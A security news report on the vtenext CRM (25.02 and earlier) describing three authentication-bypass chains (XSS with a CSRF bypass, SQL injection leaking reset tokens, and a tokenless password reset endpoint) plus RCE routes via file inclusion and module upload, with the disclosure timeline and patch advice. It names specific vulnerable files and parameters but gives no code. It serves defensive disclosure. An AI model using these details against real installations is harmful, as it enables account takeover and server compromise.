Multiple vtenext Flaws Allow Authentication Bypass and Remote Code Execution

Vtenext’s CRM solution, widely used by small and medium-sized Italian enterprises, suffers from multiple critical flaws in version 25.02 and earlier.

Three distinct unauthenticated vectors enable attackers to bypass authentication and ultimately achieve remote code execution (RCE) on the target server.

Although version 25.02.1 silently patched the most severe vector, the remaining issues still put countless deployments at risk. Administrators are strongly urged to update immediately to mitigate exposure.

Attack Vectors Overview

The chained vulnerabilities in Vtenext 25.02 can be grouped into three authentication-bypass vectors.

Each requires progressively less user interaction:

Vector #	Primary Flaw	Secondary Flaws	User Interaction Required	Authentication Gain
1	Reflected XSS via POST (improper sanitization)	CSRF bypass (HTTP method tampering), session leak	Yes	Arbitrary user session hijack
2	Reflected XSS via POST	CSRF bypass, SQL injection	Yes	Extraction of password reset token
3	Arbitrary password reset (missing token validation)	N/A	No	Full account takeover (including admin)

Vector 1: Multi-Stage XSS Chain

The first vector exploits a reflected XSS in HomeWidgetBlockList.php, where widget IDs from unsanitized JSON are returned with a text/html content-type.

Attackers inject JavaScript payloads to exfiltrate the victim’s session cookie, bypassing the HttpOnly flag through an information-disclosure flaw in the Touch module.

By switching from POST to GET, they circumvent CSRF token checks entirely. This sequence enables session hijacking and full authentication bypass with minimal effort.

Vector 2: SQL Injection Escalation

Similar to Vector 1, the second chain begins with reflected XSS and CSRF bypass but adds a SQL injection in modules/Fax/EditView.php.

Although prepared statements are used, user-controlled fieldname parameters are interpolated directly into queries.

By injecting subqueries, attackers extract password reset tokens from vte_userauthtoken. Possession of the token allows an attacker to reset any user’s password and log in as that account.

Vector 3: Silent Password Reset

The most critical vector requires no user interaction. The hub/rpwd.php endpoint’s change_password action processes arbitrary user_name and confirm_new_password parameters without validating the reset token.

By invoking the change logic with skipOldPwdCheck set to true, any account’s password can be updated directly—effectively granting attackers immediate, unauthenticated administrative access.

RCE Primitives

Once authenticated, attackers can achieve RCE through:

• Local File Inclusion (LFI): Multiple endpoints allow path traversal to include PHP files; pearcmd.php can be leveraged to write and execute arbitrary PHP code if PEAR is installed.
• Module Upload: Administrators can import malicious custom modules as web shells, guaranteeing RCE by design.

Disclosure and Mitigation

The researcher repeatedly attempted responsible disclosure from May 28 to July 13, 2025, but received no meaningful response until after public notification.

On July 24, version 25.02.1 silently patched Vector 3; Vtenext has since acknowledged missed communications due to spam filtering.

However, Vtenext installations worldwide still face exposure from Vectors 1 and 2. Immediate upgrade to version 25.02.1 or later is imperative, and a comprehensive security review of custom modules and exposed endpoints is recommended.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates

The post Multiple vtenext Flaws Allow Authentication Bypass and Remote Code Execution appeared first on Cyber Security News.